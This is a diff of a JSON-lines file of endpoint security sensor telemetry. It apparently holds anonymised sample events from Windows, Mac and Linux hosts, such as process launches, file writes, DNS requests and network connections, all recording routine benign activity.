-{"AuthenticationId":"3443175","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","ContextProcessId":"1091372257857","ContextThreadId":"36855848099771","ContextTimeStamp":"1604855227.625","DiskParentDeviceInstanceId":"PCI\\VEN_1179\u0026DEV_0113\u0026SUBSYS_00011179\u0026REV_01\\4\u00263ad42678\u00260\u002600E0","EffectiveTransmissionClass":"3","Entitlements":"15","FileEcpBitmask":"0","FileIdentifier":"f5ce07c6af67ec4ebe0846ff200bfc2f54f7020000002100","FileObject":"18446603341701082336","IrpFlags":"1028","IsOnNetwork":"0","IsOnRemovableDisk":"0","MajorFunction":"18","MinorFunction":"0","OperationFlags":"0","Size":"288041","TargetFileName":"\\Device\\HarddiskVolume3\\Users\\user12\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\TempState\\Downloads\\ex.pdf.8e41hf8.partial","TokenType":"1","aid":"ffffffff32cb4abc50bc133b31a69946","aip":"208.30.227.225","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"PdfFileWritten","id":"ffffffff-1111-11eb-baea-02dccfbb7779","name":"PdfFileWrittenV11","timestamp":"1604855264313"} -{"AuthenticationId":"3783389","CommandLine":"\"C:\\WINDOWS\\system32\\backgroundTaskHost.exe\" 
-ServerName:App.AppXnme9zjyebb2xnyygh6q9ev6p5d234br2.mca","ConfigBuild":"1007.3.0012309.1","ConfigStateHash":"3998263252","EffectiveTransmissionClass":"3","Entitlements":"15","ImageFileName":"\\Device\\HarddiskVolume3\\Windows\\System32\\backgroundTaskHost.exe","ImageSubsystem":"2","IntegrityLevel":"4096","MD5HashData":"50d5fd1290d94d46acca0585311e74d5","ParentAuthenticationId":"3783389","ParentBaseFileName":"svchost.exe","ParentProcessId":"2439558094566","ProcessCreateFlags":"525332","ProcessEndTime":"","ProcessParameterFlags":"16385","ProcessStartTime":"1604855181.648","ProcessSxsFlags":"1600","RawProcessId":"22272","RpcClientProcessId":"2439558094566","SHA1HashData":"0000000000000000000000000000000000000000","SHA256HashData":"b8e176fe76a1454a00c4af0f8bf8870650d9c33d3e333239a59445c5b35c9a37","SessionId":"1","SourceProcessId":"2439558094566","SourceThreadId":"77538684027214","Tags":"41, 12094627905582, 12094627906234","TargetProcessId":"2450046082233","TokenType":"2","UserSid":"S-1-12-1-3697283754-1083485977-2164330645-2516515886","WindowFlags":"128","aid":"ffffffff655344736aca58d17fb570f0","aip":"208.239.110.158","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"ProcessRollup2","id":"ffffffff-1111-11eb-8462-02ade3b2f949","name":"ProcessRollup2V18","timestamp":"1604855182022"} -{"AuthenticationId":"326190744","AuthenticationUuid":"98467113-C771-4845-B71B-89B3CE9F93C9","AuthenticationUuidAsString":"13714698-71C7-4548-B71B-89B3CE9F93C9","ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"1457965279","Entitlements":"15","UID":"326190744","UserPrincipal":"user8@dom6","UserSid":"S-1-5-21-3629339319-2376021926-2724479216-652382488","aid":"ffffffff1f32487185fcde66a9dc0528","aip":"208.69.144.69","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"UserIdentity","id":"ffffffff-1111-11eb-b9b4-063e98f9b19b","name":"UserIdentityMacV2","timestamp":"1604855355388"} -{"BootArgs":" NOEXECUTE=OPTIN 
HYPERVISORLAUNCHTYPE=AUTO FVEBOOT=2125824 NOVGA","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"1874387338","EffectiveTransmissionClass":"0","Entitlements":"15","MachineDomain":"","aid":"ffffffffcdb543135e7fcdf8e5a8fbdb","aip":"208.6.139.160","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"HostInfo","id":"ffffffff-1111-11eb-9bbd-061290dcd983","name":"HostInfoV2","timestamp":"1604855157555"}
-{"AuthenticationId":"703298","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"2642284486","ContextProcessId":"1161025471861","ContextThreadId":"34929528116709","ContextTimeStamp":"1604851030.593","DiskParentDeviceInstanceId":"USB\\VID_1058\u0026PID_2621\\57583431453939315A4C5255","EffectiveTransmissionClass":"3","Entitlements":"15","FileEcpBitmask":"0","FileIdentifier":"262fbc677256cf4c8d6c6a227285a072c06830873b000000","FileObject":"18446664963104449168","IrpFlags":"1028","IsOnNetwork":"0","IsOnRemovableDisk":"1","MajorFunction":"18","MinorFunction":"0","OperationFlags":"0","Size":"517029","TargetFileName":"\\Device\\HarddiskVolume5\\01.png.tmp$$","TokenType":"1","UserName":"user9","aid":"ffffffff16bf4c7bb5ad755a4722025c","aip":"208.216.134.196","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"GenericFileWritten","id":"ffffffff-1111-11eb-800a-06cecfd73923","name":"GenericFileWrittenV11","timestamp":"1604851031298"}
-{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"666346415","ContextProcessId":"1717987648455","ContextThreadId":"55064470042288","ContextTimeStamp":"1604850899.164","EffectiveTransmissionClass":"3","Entitlements":"15","VolumeName":"\\Device\\HarddiskVolume27","aid":"ffffffff896b43725b83c79aa79959da","aip":"208.216.150.196","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"FsVolumeUnmounted","id":"ffffffff-1111-11eb-9f70-0634389d9ea9","name":"FsVolumeUnmountedV2","timestamp":"1604850899812"}
-{"ConfigBuild":"1007.4.0009906.1","ConfigStateHash":"3429017943","ContextProcessId":"66426035996442255","ContextTimeStamp":"1604851098.548","Entitlements":"15","aid":"ffffffff899541b94b9adff8922aa70a","aip":"208.193.200.164","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"FirewallDisabled","id":"ffffffff-1111-11eb-9d4c-02f402df8c1f","name":"FirewallDisabledMacV1","timestamp":"1604851040625"}
+{"ParentProcessId":"362225661973273550","SourceProcessId":"362225661973273550","aip":"67.43.156.14","SessionProcessId":"363970027584976556","SyntheticPR2Flags":"8","event_platform":"Mac","SVUID":"501","id":"ffffffff-1111-11eb-8dd4-061759968cdf","EffectiveTransmissionClass":"2","timestamp":"1625677521162","ProcessGroupId":"363970027584976556","event_simpleName":"SyntheticProcessRollup2","RawProcessId":"9505","ContextTimeStamp":"1625677521.137","GID":"20","ConfigStateHash":"1620585913","SVGID":"20","ConfigBuild":"1007.4.0013701.1","UID":"501","CommandLine":"/bin/sh -s unix:cmd","TargetProcessId":"363970027584976556","ImageFileName":"/bin/sh","RGID":"501","SourceThreadId":"0","Entitlements":"15","name":"SyntheticProcessRollup2MacV3","RUID":"501","aid":"ffffffffa63e404bba4bff7465ab3afb","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
+{"FileDeletedCount":"0","DirectoryCreatedCount":"0","ContextThreadId":"0","aip":"67.43.156.14","NetworkConnectCount":"0","NetworkListenCount":"0","event_platform":"Mac","NetworkBindCount":"0","NetworkRecvAcceptCount":"0","id":"ffffffff-1111-11eb-9d75-02bcf3ade03b","NewExecutableWrittenCount":"0","NetworkCloseCount":"0","EffectiveTransmissionClass":"3","SuspectStackCount":"0","timestamp":"1625677524102","event_simpleName":"EndOfProcess","RawProcessId":"33454","ContextTimeStamp":"1625677523.068","ConfigStateHash":"3090255842","ContextProcessId":"365053603452626914","AsepWrittenCount":"0","SuspiciousDnsRequestCount":"0","ConfigBuild":"1007.4.0013701.1","NetworkCapableAsepWriteCount":"0","ExecutableDeletedCount":"0","TargetProcessId":"365053603452626914","DnsRequestCount":"0","Entitlements":"15","name":"EndOfProcessMacV15","aid":"ffffffff3c0846978560dbc0048d6555","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
+{"event_simpleName":"RawBindIP6","ContextTimeStamp":"1625677488.594","LocalAddressIP6":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6","RemoteAddressIP6":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6","ConfigStateHash":"1620585913","ConnectionFlags":"0","ContextProcessId":"365042236081053654","RemotePort":"546","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LocalPort":"547","Entitlements":"15","name":"RawBindIP6MacV10","id":"ffffffff-1111-11eb-ad8d-064c77be2fd1","Protocol":"17","EffectiveTransmissionClass":"3","aid":"ffffffffc59c473aa7fcbbe7438082cb","ConnectionDirection":"2","InContext":"0","timestamp":"1625677488615","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
+{"event_simpleName":"ProcessRollup2Stats","ConfigStateHash":"1620585913","Timeout":"600","aip":"67.43.156.14","SHA256HashData":"f8bd34d4ac025f862c6fe8f3fd3f170072f94f1f2ec9dc6cb2d7925422b77018","ProcessCount":"4","ConfigBuild":"1007.4.0013701.1","UID":"502","event_platform":"Mac","CommandLine":"ruby --disable-gems sorbet/feature_dependency_plugin.rb --class 
EmergingAlbertsonsPickupBannerDiscount --method feature_dependency --source feature_dependency Domain::FeatureDependencies::RouletteUserFeature.new(\n feature_name: FEATURE_NAME,\n variants: [FEATURE_VARIANT],\n )","Entitlements":"15","name":"ProcessRollup2StatsMacV1","id":"ffffffff-1111-11eb-822b-06081a3f0f45","EffectiveTransmissionClass":"2","aid":"ffffffff59fe460783ea45d59e417d6f","timestamp":"1625677504527","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
+{"event_simpleName":"SensorHeartbeat","ConfigStateHash":"3090255842","NetworkContainmentState":"0","aip":"67.43.156.14","ConfigIDBase":"65994753","SensorStateBitMap":"0","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","ConfigurationVersion":"10","Entitlements":"15","name":"SensorHeartbeatMacV4","ConfigIDPlatform":"4","id":"ffffffff-1111-11eb-97c6-02fd02aca859","ConfigIDBuild":"13701","EffectiveTransmissionClass":"0","aid":"ffffffffe1ad47b6b5b44ae9151a6cf3","ProvisionState":"1","timestamp":"1625677514783","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
+{"MachOSubType":"1","ParentProcessId":"362213307092004097","SourceProcessId":"362213307092004097","aip":"67.43.156.14","SessionProcessId":"362213307092004097","SHA1HashData":"0000000000000000000000000000000000000000","event_platform":"Mac","ProcessEndTime":"","SVUID":"0","ParentBaseFileName":"launchd","id":"ffffffff-1111-11eb-a9ce-02e9216bdbcb","EffectiveTransmissionClass":"2","timestamp":"1625677502500","ProcessGroupId":"362213307092004097","event_simpleName":"ProcessRollup2","RawProcessId":"56254","GID":"0","ConfigStateHash":"1620585913","SVGID":"0","MD5HashData":"88922d50263b059696c2af5a99906562","SHA256HashData":"d4ff1c438e330777002332a305fcf965cfaa7d0dbeb899293d347298cbf6d4b6","ConfigBuild":"1007.4.0013701.1","UID":"0","CommandLine":"xpcproxy 
com.apple.mdworker.shared.01000000-0600-0000-0000-000000000000","TargetProcessId":"363276350115996101","ImageFileName":"/usr/libexec/xpcproxy","RGID":"0","SourceThreadId":"0","Entitlements":"15","name":"ProcessRollup2MacV5","RUID":"0","ProcessStartTime":"1625677502.233","aid":"ffffffff8be84591864008eb2e484920","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
+{"LocalAddressIP4":"0.0.0.0","event_simpleName":"NetworkReceiveAcceptIP4","ContextTimeStamp":"1625677504.982","ConfigStateHash":"1701000200","ConnectionFlags":"0","ContextProcessId":"17307488247882","RemotePort":"53","aip":"67.43.156.14","ConfigBuild":"1007.8.0011308.1","event_platform":"Lin","LocalPort":"39920","Entitlements":"15","name":"NetworkReceiveAcceptIP4LinV5","id":"ffffffff-1111-11eb-9d7c-02e8a46f51a5","Protocol":"17","EffectiveTransmissionClass":"3","aid":"ffffffff5a2e420c99f6b6d3a5d9de9b","RemoteAddressIP4":"67.43.156.14","ConnectionDirection":"1","InContext":"0","timestamp":"1625677505511","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
+{"LocalAddressIP4":"67.43.156.14","event_simpleName":"RawBindIP4","ContextTimeStamp":"1625677521.866","ConfigStateHash":"3090255842","ConnectionFlags":"0","ContextProcessId":"362579458925546303","RemotePort":"0","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LocalPort":"53","Entitlements":"15","name":"RawBindIP4MacV10","id":"ffffffff-1111-11eb-81d4-0282ad9ac82d","Protocol":"17","EffectiveTransmissionClass":"3","aid":"ffffffff01fc49949cf06bf0bce3c010","RemoteAddressIP4":"0.0.0.0","ConnectionDirection":"2","InContext":"0","timestamp":"1625677522009","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
+{"event_simpleName":"NetworkConnectIP6","ContextTimeStamp":"1625677523.901","LocalAddressIP6":"0:0:0:0:0:0:0:0","RemoteAddressIP4":"127.0.0.1","ConfigStateHash":"3090255842","ConnectionFlags":"0","ContextProcessId":"364783686797112486","RemotePort":"50626","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LocalPort":"0","Entitlements":"15","name":"NetworkConnectIP6MacV10","id":"ffffffff-1111-11eb-97c6-02fd02aca859","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffff083845f68a7de3d95cb34361","ConnectionDirection":"0","InContext":"0","timestamp":"1625677524048","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
+{"ParentProcessId":"38911774195823","SourceProcessId":"38911774195823","aip":"67.43.156.14","SessionProcessId":"38911772846634","SHA1HashData":"0000000000000000000000000000000000000000","event_platform":"Lin","ProcessEndTime":"1625677535.102","SVUID":"114","ParentBaseFileName":"bash","id":"ffffffff-1111-11eb-bad4-02690d039c6b","EffectiveTransmissionClass":"2","timestamp":"1625677535482","ProcessGroupId":"9277112078","event_simpleName":"ProcessRollup2","RawProcessId":"73249","GID":"119","ConfigStateHash":"1284133626","SVGID":"119","MD5HashData":"29037cef466fa57f03bd1b2a092c47a4","SHA256HashData":"a4f11f04df7aa3ac611dcbdb3e3d934a8f0523ea17b0a41a1809c380efd2d112","ConfigBuild":"1007.8.0010912.1","UID":"114","CommandLine":"pgbackrest --stanza\u003dmain archive-get 000000020004D51F0000009F pg_wal/RECOVERYXLOG","TargetProcessId":"38911778380590","ImageFileName":"/usr/bin/pgbackrest","RGID":"119","SourceThreadId":"0","Entitlements":"15","name":"ProcessRollup2LinV6","RUID":"114","ProcessStartTime":"1625677535.068","aid":"ffffffffcf45409f87ed463b40c368ec","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
+{"event_simpleName":"NetworkConnectIP6","ContextTimeStamp":"1625677503.713","LocalAddressIP6":"0:0:0:0:0:0:0:1","RemoteAddressIP6":"0:0:0:0:0:0:0:1","ConfigStateHash":"1701000200","ConnectionFlags":"0","ContextProcessId":"17307455014463","RemotePort":"0","aip":"67.43.156.14","ConfigBuild":"1007.8.0011308.1","event_platform":"Lin","LocalPort":"41952","Entitlements":"15","name":"NetworkConnectIP6LinV5","id":"ffffffff-1111-11eb-9d7c-02e8a46f51a5","Protocol":"17","EffectiveTransmissionClass":"3","aid":"ffffffff5a2e420c99f6b6d3a5d9de9b","ConnectionDirection":"0","InContext":"0","timestamp":"1625677503947","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
+{"event_simpleName":"OoxmlFileWritten","ContextTimeStamp":"1625677520.973","ConfigStateHash":"3090255842","ContextProcessId":"365044948432500700","ContextThreadId":"0","aip":"67.43.156.14","FileIdentifier":"0500000100000000000000000000000021b0260000000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"OoxmlFileWrittenMacV1","id":"ffffffff-1111-11eb-8ad1-02cfdadef55f","EffectiveTransmissionClass":"2","aid":"ffffffff20bd481a98a3d1f6191047ff","timestamp":"1625677521081","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Users/user1/Library/Application Support/Google/DriveFS/110588730849638631570/content_cache/d23/d44/432508"}
+{"LocalAddressIP4":"67.43.156.14","event_simpleName":"NetworkConnectIP4","ContextTimeStamp":"1625677530.308","ConfigStateHash":"3469235958","ConnectionFlags":"0","ContextProcessId":"12227094573885","RemotePort":"80","aip":"67.43.156.13","ConfigBuild":"1007.8.0011308.1","event_platform":"Lin","LocalPort":"59926","Entitlements":"15","name":"NetworkConnectIP4LinV5","id":"ffffffff-1111-11eb-b727-028bbe41f38d","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffffbd064538b214ab0dce8e82c3","RemoteAddressIP4":"67.43.156.14","ConnectionDirection":"0","InContext":"0","timestamp":"1625677530841","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
+{"ChannelVersion":"0","event_simpleName":"ChannelVersionRequired","ConfigStateHash":"1156120155","ChannelDiffStatus":"1","aip":"67.43.156.14","ChannelVersionRequired":"0","ChannelId":"12","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","name":"ChannelVersionRequiredLinV2","id":"ffffffff-1111-11eb-b7e0-02332cdcc16d","ErrorCode":"0","aid":"ffffffff25b14d4aa96de99e24bad2fa","timestamp":"1625677493974","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
+{"event_simpleName":"LocalIpAddressIP6","LocalAddressIP6":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6","ConfigStateHash":"1156120155","CreationTimeStamp":"1625677520.686","aip":"67.43.156.14","PhysicalAddress":"6e-9e-e0-1f-6d-7d","InterfaceAlias":"vethdeb0243","InterfaceIndex":"3736","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","InterfaceType":"1","name":"LocalIpAddressIP6LinV1","id":"ffffffff-1111-11eb-92d2-0286f570f8e1","PhysicalAddressLength":"6","aid":"ffffffffc9114c1898e79604708955a6","timestamp":"1625677521218","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
+{"ChannelVersion":"0","event_simpleName":"ChannelVersionRequired","ConfigStateHash":"1620585913","ChannelDiffStatus":"1","aip":"67.43.156.13","ChannelVersionRequired":"0","ChannelId":"210","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"ChannelVersionRequiredMacV2","id":"ffffffff-1111-11eb-8cc5-02c6fb049dd3","ErrorCode":"0","EffectiveTransmissionClass":"0","aid":"ffffffff2d7b4778a73b2cf58d327e42","timestamp":"1625677480455","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
+{"event_simpleName":"SensorHeartbeat","ConfigStateHash":"1156120155","NetworkContainmentState":"0","aip":"67.43.156.14","ConfigIDBase":"65994753","SensorStateBitMap":"2","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","ConfigurationVersion":"10","name":"SensorHeartbeatLinV4","ConfigIDPlatform":"8","id":"ffffffff-1111-11eb-993f-02b8dc387eb5","ConfigIDBuild":"11611","aid":"fffffffff6e146908cbf31d72b94b626","timestamp":"1625677540292","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
+{"event_simpleName":"JavaClassFileWritten","ContextTimeStamp":"1625677528.570","ConfigStateHash":"3090255842","ContextProcessId":"364783686797112486","ContextThreadId":"0","aip":"67.43.156.14","FileIdentifier":"04000001000000000000000000000000986b480e00000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"JavaClassFileWrittenMacV1","id":"ffffffff-1111-11eb-97c6-02fd02aca859","EffectiveTransmissionClass":"2","aid":"ffffffff083845f68a7de3d95cb34361","timestamp":"1625677528717","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Users/user2/shopper-one/tooling/teams-plugin/build/classes/kotlin/main/com/instacart/shopper/tooling/TeamsPlugin$apply$$inlined$configure$1.class"}
+{"LocalAddressIP4":"0.0.0.0","event_simpleName":"NetworkConnectIP4","ContextTimeStamp":"1625677512.700","ConfigStateHash":"1620585913","ConnectionFlags":"0","ContextProcessId":"364796317497854624","RemotePort":"443","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LocalPort":"0","Entitlements":"15","name":"NetworkConnectIP4MacV10","id":"ffffffff-1111-11eb-9c94-0222a21bbb27","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffff96f142f6b2475f3c584ddd80","RemoteAddressIP4":"67.43.156.14","ConnectionDirection":"0","InContext":"0","timestamp":"1625677512892","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
+{"event_simpleName":"DnsRequest","ContextTimeStamp":"1625677475.806","ConfigStateHash":"1620585913","ContextProcessId":"364977197365370629","DomainName":"jss.dom1.com","ContextThreadId":"0","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"DnsRequestMacV1","id":"ffffffff-1111-11eb-9644-060415b1fd87","EffectiveTransmissionClass":"2","aid":"ffffffff7ecf4e61bba14ca5ac5d17b1","timestamp":"1625677476111","cid":"ffffffff15754bcfb5f9152ec7ac90ac","RequestType":"28"}
+{"event_simpleName":"NewScriptWritten","ContextTimeStamp":"1625677504.770","ConfigStateHash":"1620585913","ContextProcessId":"365053504406857894","Size":"0","ContextThreadId":"0","aip":"67.43.156.14","SHA256HashData":"2d9a331f045a9c6b13d45eabe948b5c7dfdc25e1251bff6756fa306581087da9","FileIdentifier":"05000001000000000000000000000000b588050000000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"NewScriptWrittenMacV2","id":"ffffffff-1111-11eb-b3de-06a53f021cc9","EffectiveTransmissionClass":"2","aid":"ffffffffbea440b9aad8b5bf222d303f","timestamp":"1625677540055","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Applications/BitBar/countdown_timer.1s.py"}
+{"InterfaceIndex":"186","ConfigBuild":"1007.8.0011611.1","event_simpleName":"LocalIpAddressRemovedIP6","event_platform":"Lin","LocalAddressIP6":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6","ConfigStateHash":"1156120155","name":"LocalIpAddressRemovedIP6LinV1","aip":"67.43.156.14","id":"ffffffff-1111-11eb-b3c1-02ff598b7945","aid":"ffffffffbfbf4ff5aa56a26ad3c1a942","timestamp":"1625677526386","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
+{"event_simpleName":"DirectoryCreate","ContextTimeStamp":"1625677499.994","GID":"0","ConfigStateHash":"3090255842","ContextProcessId":"365053555029062046","ContextThreadId":"0","aip":"67.43.156.14","Flags":"0","ConfigBuild":"1007.4.0013701.1","UID":"0","event_platform":"Mac","UnixMode":"0","Entitlements":"15","name":"DirectoryCreateMacV1","id":"ffffffff-1111-11eb-92d2-0286f570f8e1","VnodeType":"2","EffectiveTransmissionClass":"2","aid":"ffffffff24db47799d1a85aae61dc7bc","TargetDirectoryName":"/private/var/folders/s8/9c47txv13vj8qx_m7cqtx2w80000gp/T/.LINKS/2F71C2D4-D215-453E-BF4C-D6C037502871","timestamp":"1625677500089","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/folders/s8/9c47txv13vj8qx_m7cqtx2w80000gp/T/.LINKS/2F71C2D4-D215-453E-BF4C-D6C037502871"}
+{"LocalAddressIP4":"67.43.156.14","event_simpleName":"NetworkCloseIP4","ContextTimeStamp":"1625677517.658","ConfigStateHash":"1479784503","ConnectionFlags":"0","ContextProcessId":"84424232977619","RemotePort":"443","aip":"67.43.156.14","ConfigBuild":"1007.8.0011308.1","event_platform":"Lin","LocalPort":"40394","Entitlements":"15","name":"NetworkCloseIP4LinV6","id":"ffffffff-1111-11eb-9015-02e89cda7d5f","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffff58de4e748d9f64c85a9b49e6","RemoteAddressIP4":"67.43.156.13","ConnectionDirection":"2","InContext":"0","timestamp":"1625677517986","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
+{"VolumeMediaName":"AppleAPFSMedia","VolumeDeviceProtocol":"PCI-Express","VolumeDeviceVendor":"","ContextThreadId":"0","VolumeMediaContent":"41504653-0000-11AA-AA11-00306543ECAC","VolumeMediaEjectable":"0","aip":"67.43.156.14","VolumeAppearanceTime":"1625677422.647","VolumeDeviceModel":"APPLE SSD 
SM0256L","VolumeMediaBSDName":"disk1s3","VolumeMountPoint":"/Volumes/Recovery","event_platform":"Mac","VolumeType":"APFS","VolumeMediaRemovable":"0","VolumeMediaBSDUnit":"1","VolumeFileSystemDriver":"apfs","id":"ffffffff-1111-11eb-956a-02748d01bd3d","VolumeMediaSize":"250685575168","EffectiveTransmissionClass":"2","VolumeBusName":"IONVMeController","timestamp":"1625677496804","VolumeMediaBSDMinor":"8","VolumeMediaWritable":"1","event_simpleName":"FsVolumeMounted","VolumeDevicePath":"IOService:/AppleACPIPlatformExpert/PCI0@0/AppleACPIPCI/RP01@1C/IOPP/SSD0@0/IONVMeController/IONVMeBlockStorageDevice@1","VolumeName":"Recovery","ContextTimeStamp":"1625677496.750","VolumeSectorSize":"4096","ConfigStateHash":"3090255842","ContextProcessId":"365053546767850587","VolumeBusPath":"IODeviceTree:/PCI0@0/RP01@1C/SSD0@0/IONVMeController","VolumeDeviceInternal":"1","ConfigBuild":"1007.4.0013701.1","VolumeUUID":"85400FAD-01F9-0442-8C5D-441F365D4909","VolumeDeviceRevision":"CXS4LA0Q","Entitlements":"15","name":"FsVolumeMountedMacV1","VolumeMediaBSDMajor":"1","VolumeMediaPath":"IOService:/AppleACPIPlatformExpert/PCI0@0/AppleACPIPCI/RP01@1C/IOPP/SSD0@0/IONVMeController/IONVMeBlockStorageDevice@1/IOBlockStorageDriver/APPLE SSD SM0256L Media/IOGUIDPartitionScheme/NoName@2/AppleAPFSContainerScheme/AppleAPFSMedia/AppleAPFSContainer/Recovery@3","aid":"ffffffff8eca418b7a861be9c5f7de1d","VolumeMediaUUID":"AD0F4085-F901-4204-8C5D-441F365D4909","VolumeMediaWhole":"0","cid":"ffffffff15754bcfb5f9152ec7ac90ac","VolumeIsNetwork":"0"} 
+{"LocalAddressIP4":"67.43.156.14","event_simpleName":"LocalIpAddressIP4","ConfigStateHash":"1156120155","CreationTimeStamp":"1625677513.841","aip":"67.43.156.14","PhysicalAddress":"0e-d6-ff-ff-ff-63","InterfaceAlias":"eth0","InterfaceIndex":"2","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","InterfaceType":"1","name":"LocalIpAddressIP4LinV1","id":"ffffffff-1111-11eb-9c94-0222a21bbb27","PhysicalAddressLength":"6","aid":"ffffffff190e436aaebc3892bcda5beb","timestamp":"1625677514374","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
+{"event_simpleName":"LocalIpAddressRemovedIP6","LocalAddressIP6":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6","ConfigStateHash":"3967242894","aip":"67.43.156.13","InterfaceIndex":"8","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","NetLuidIndex":"0","Entitlements":"15","name":"LocalIpAddressRemovedIP6MacV1","id":"ffffffff-1111-11eb-9dc2-029257dbe83b","EffectiveTransmissionClass":"2","aid":"ffffffff44564c2f8d76394cb25c31ab","timestamp":"1625677480056","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
+{"OutOctets":"0","CreationTimeStamp":"","aip":"67.43.156.14","OutMulticastPkts":"0","InErrors":"0","InterfaceAlias":"llw0","InDiscards":"0","InterfaceIndex":"8","event_platform":"Mac","InterfaceType":"6","id":"ffffffff-1111-11eb-b88d-06b7cb0d7bd7","PhysicalAddressLength":"6","InUcastPkts":"0","EffectiveTransmissionClass":"2","timestamp":"1625677521723","event_simpleName":"LocalIpAddressIP6","LocalAddressIP6":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6","ConfigStateHash":"1620585913","PhysicalAddress":"c2-27-b0-27-83-0f","OutErrors":"0","InUnknownProtos":"0","OutUcastPkts":"0","InMulticastPkts":"0","ConfigBuild":"1007.4.0013701.1","InOctets":"0","NetLuidIndex":"0","Entitlements":"15","name":"LocalIpAddressIP6MacV1","aid":"ffffffff0ad7494e8e817b3903f4eebb","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
+{"LocalAddressIP4":"0.0.0.0","event_simpleName":"NetworkListenIP4","ContextTimeStamp":"1625677507.037","ConfigStateHash":"3090255842","ConnectionFlags":"0","ContextProcessId":"364432308748445743","RemotePort":"0","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LocalPort":"50647","Entitlements":"15","name":"NetworkListenIP4MacV10","id":"ffffffff-1111-11eb-8b36-06a8af5164a9","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffff23d24c4193ffa6f270775ee5","RemoteAddressIP4":"0.0.0.0","ConnectionDirection":"2","InContext":"0","timestamp":"1625677507086","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
+{"event_simpleName":"ExecutableDeleted","ContextTimeStamp":"1625677536.729","ConfigStateHash":"3090255842","ContextProcessId":"364994904864288322","ContextThreadId":"0","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"ExecutableDeletedMacV1","id":"ffffffff-1111-11eb-8ca0-0231588e8cbb","EffectiveTransmissionClass":"2","aid":"ffffffffa7bf46da689501ce58bd6987","timestamp":"1625677536784","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Users/user3/Library/Caches/com.tinyspeck.slackmacgap.ShipIt/update.FXKsmFO/Slack.app/Contents/Frameworks/Squirrel.framework/Versions/A/Resources/ShipIt"}
